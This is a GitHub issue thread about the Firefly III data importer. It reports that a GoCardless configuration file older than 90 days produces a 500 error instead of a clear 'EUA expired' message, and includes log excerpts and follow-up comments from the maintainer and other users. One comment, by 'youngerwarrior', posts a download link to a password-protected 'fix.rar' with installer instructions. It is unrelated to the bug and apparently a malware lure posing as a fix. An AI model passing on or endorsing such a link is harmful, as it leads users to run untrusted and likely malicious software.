### ISSUE TITLE
Data importer - gocardless EUA is expired - print clear message instead of 500 server error

### ISSUE THREAD

**Issue by Ovenlade** [firefly-iii/firefly-iii#9180]
### Support guidelines

- [X] I've read the [support guidelines](https://github.com/firefly-iii/firefly-iii/blob/main/.github/support.md)

### I've found a bug and checked that ...

- [X] ... [the documentation](https://docs.firefly-iii.org/) does not mention anything about my problem
- [X] ... there are no open or closed issues that are related to my problem
- [X] ... it's [definitely a Firefly III issue, not me](https://github.com/firefly-iii/firefly-iii/blob/main/.github/its_you_not_me.md)

### Description

A 500 server error showed when using a saved .json configuration file using gocardless that was more than 90 days old. In the log I found out the real reason.

### Debug information

[2024-08-26 19:55:42] production.DEBUG: authenticatedGet(https://bankaccountdata.gocardless.com/api/v2/accounts/99999d0a9-9b99-9b99-aa99-999999999e99/transactions/)  
[2024-08-26 19:55:42] production.ERROR: GuzzleHttp\Exception\ClientException: Client error: `GET https://bankaccountdata.gocardless.com/api/v2/accounts/99999d9a9-9b99-9b99-aa99-999999999e99/transactions/` resulted in a `400 Bad Request` response:
{"summary":"End User Agreement (EUA) 9bef9ada-9a99-9999-99ee-9fa9a9f99a99 has expired","detail":"EUA was valid for 90 da (truncated...)
  
[2024-08-26 19:55:42] production.ERROR: {"summary":"End User Agreement (EUA) 9bef9ada-9a99-9999-99ee-9fa9a9f99a99 has expired","detail":"EUA was valid for 90 days and it expired at 2024-08-25 18:07:49.445149. The end user must connect the account once more with new EUA and Requisition","status_code":400}  
[2024-08-26 19:55:42] production.ERROR:  {"exception":"[object] (App\\Exceptions\\AgreementExpiredException(code: 0):  at /var/www/html/app/Services/Nordigen/Request/Request.php:142)
[stacktrace]
#0 /var/www/html/app/Services/Nordigen/Request/GetTransactionsRequest.php(63): App\\Services\\Nordigen\\Request\\Request->authenticatedGet()

### Expected behaviour

When the EUA from gocardless is expired you have to start the configuration a new instead of choosing a saved json. The goal of this issue is to intercept this message and show it to the user instead of showing an 500 server error.

The messages could be: "EUA was valid for 90 days and it expired at [date and time]. The end user must connect the account once more with new EUA and Requisition"

### Steps to reproduce

1. Import from GoCardless -> Pre-made configuration file 
2. Choose a .json file that worked before but is now +90 days old
3. next
4. 500 server error

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by JC5** [comment]
Thanks for reporting! Which version of the data importer are you using?

**Comment by Ovenlade** [comment]
I'm using the latest Home Assistant add on, version 1.5.4 (24-08-2024).

**Comment by toffee** [comment]
I'm using data-importer 1.5.6 and can confirm the issue. 

Additionally seems that if you run the import from cron job using multiple configuration files (that means multiple imports) at first error (such this - EUA expired) the following imports are skipped. In the past only the affected import was missed  (maybe changed due to recent changes to rate limit). 

I wrote this here - because with this error I found out that some imports missed, but I can open a new issue if requested.
